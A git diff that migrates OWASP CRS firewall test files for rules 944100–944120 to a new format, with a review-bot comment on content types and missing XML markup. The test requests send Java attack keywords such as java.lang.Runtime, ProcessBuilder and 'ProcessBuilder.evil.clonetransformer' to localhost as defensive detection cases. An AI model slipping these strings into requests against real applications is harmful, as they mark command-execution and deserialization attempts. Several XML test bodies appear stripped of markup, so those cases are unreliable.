text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - 
Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: 
gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8..7cf19d1 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml 
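Review bot: Tests 2-4 are described as argument-name/value checks but send their body as `Content-Type: "text/plain"`, while test 1 uses `application/x-www-form-urlencoded`; whether `test=java.lang.ProcessBuilder` reaches ARGS under text/plain depends on a body processor or raw-body target being available for it, which the 944000 hunk above states it is not, so these cases may be matching through something other than what their descs claim or relying on a harness setting. Use `application/x-www-form-urlencoded` for the ARGS/ARGS_NAMES cases (2-4) and keep text/plain for the cookie and header cases (5-10), whose bodies are an inert `test=value` and so isolate the vector. Separately, the `data:` fields of the XML cases 11-18 show no markup here (`"value"`, `"element_value"`, `"java.lang.Runtime"`): tests 13 and 17 could not pass as rendered, which suggests the page dropped the tags, but it is worth confirming the committed file still carries the `java.lang.Runtime` / `java.lang.ProcessBuilder` element and attribute names, since without them tests 11, 12, 15 and 16 pass vacuously.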
@@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" - description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 2 desc: Argument test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log: + expect_ids: [944110] + - test_id: 3 desc: Argument name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log: + expect_ids: [944110] + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log: + expect_ids: [944110] + - test_id: 5 desc: Cookie test includes keywords 
java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 6 desc: Cookie test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 7 desc: Cookie name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 8 desc: Cookie name includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 9 desc: Request header test includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 10 desc: Request header test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 11 desc: XML element includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 13 desc: XML attribute value includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 15 desc: XML element includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 17 desc: XML attribute value includes 
keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log: + expect_ids: [944110] 
diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
index b1c48a5..f4b8e75 100644
--- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
+++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
@@ -1,2945 +1,2944 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + 